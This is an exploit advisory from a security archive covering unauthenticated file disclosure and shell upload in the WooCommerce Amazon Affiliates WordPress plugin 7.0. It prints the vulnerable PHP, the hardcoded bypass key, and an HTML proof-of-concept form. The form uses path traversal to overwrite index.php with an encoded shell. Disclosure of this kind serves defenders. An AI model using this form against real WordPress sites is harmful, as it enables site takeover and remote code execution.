exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress WooCommerce Amazon Affiliates 7.0 Shell Upload / File Disclosure

WordPress WooCommerce Amazon Affiliates 7.0 Shell Upload / File Disclosure
Posted Apr 26, 2015
Authored by Evex

WordPress WooCommerce Amazon Affiliates plugin version 7.0 suffers from file disclosure and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, info disclosure
SHA-256 | 6bf85916f8328ca14bfba59426f65b3d54e44bb1f87dfe285d315cafe7390693

WordPress WooCommerce Amazon Affiliates 7.0 Shell Upload / File Disclosure

Change Mirror Download
WooCommerce Amazon Affiliates Wordpress Plugin Unauthenicated Arbitrary
File Upload & LFD
Link:
http://codecanyon.net/item/woocommerce-amazon-affiliates-wordpress-plugin/3057503
Version: 7.0

This Plugin is Vulnerable to Local File Disclosure and Remote Code Execute
via Arbitrary File Upload.

Vulnerability Code(Shorted):
class abmRemoteSupport{

public function __construct(){
$this->load_config();
$this->validate_connection();
$this->triggers();
}

private function load_config(){
require_once( 'remote_init.php' );
$this->config = $aa_tunnel_config;

/* in remote_init.php
* $aa_tunnel_config = array(
* "key" => "69efc4922575861f31125878597e97cf",
* );
*/
}

private function validate_connection(){
$coming_key = isset($_REQUEST['connection_key']) ?
$_REQUEST['connection_key'] : '';
if( trim($coming_key) == "" || $coming_key != $this->config['key']
){
$this->print_error( array('code' => 101,'msg' => "Invalid
key!"), 'fatal' );
}
return true;
}

private function triggers(){
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
if( $action == 'browse_folder' )
$this->browse_folder();
if( $action == 'open_file' )
$this->open_file();
if( $action == 'save_file' )
$this->save_file();
$this->print_response();
}

private function save_file(){
$file = isset($_REQUEST['file']) ? urldecode($_REQUEST['file']) :
'';
$file_content = isset($_REQUEST['file_content']) ?
@base64_decode($_REQUEST['file_content']) : '';
if( file_exists( $file )) {
$write_file = @file_put_contents( $file, $file_content );
if( $write_file ){
$this->response = array('status' => 'valid','file_path' =>
$file,'file_type' => end( explode(".", $file ) ));
}else{
$this->response = array('status' => 'invalid','msg' =>
'Unable to write on file','file_type' => end( explode(".", $file ) ),
'file_path' => $file);
}
}
}

private function open_file()
{
$file = isset($_REQUEST['file']) ? $this->config['path'] .
$_REQUEST['file'] : '';
if( file_exists( $file ) ) {
$file_content = file_get_contents( $file );
$this->response = array(
'status' => 'valid',
'file_path' => $file,
'file_type' => end( explode(".", $file ) ),
'file_name' => end( explode("/", $file ) ),
'file_alias' => md5( $file ),
'content' => $file_content
);
}
}

new abmRemoteSupport();
Vulnerable Code End.

so as you see it using authenication! in 'validate_connection' function its
validating connection through checking the requested key with the defined
one ($this->config['key']). the pass is an md5 value
'69efc4922575861f31125878597e97cf' but when authenicating its comparing
$_REQUEST['connection_key'] with '69efc4922575861f31125878597e97cf'
Directly without encoding the requested key in md5. so it can be directly
passed by passing the original value '69efc4922575861f31125878597e97cf'.

Conclusion: 'remote_tunnel.php'?!! this looks a suspicious name though! its
confusing if the vendor did this on purpose or not, because there is
protections in other methods.

Proof of Concept:
<form action="
http://wordpress/wp-content/plugins/wwc-amz-aff/modules/remote_support/remote_tunnel.php"
method="post" >
<input type="hidden" name="connection_key"
value="69efc4922575861f31125878597e97cf" >
<input name="action" value="save_file" ><br>
<input name="file" value="../../../index.php"><br>
<textarea name="file_content" >BASE64 ENCODED SHELL</textarea><br>
<input type="submit" ><br>
</form>

Timeline:
Discovered - March 2015
Vendor Contact - March 2015
No Reply - April 2015
Public Disclosure - April 2015

@Evex_1337
http://research.evex.pw/?vuln=13
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close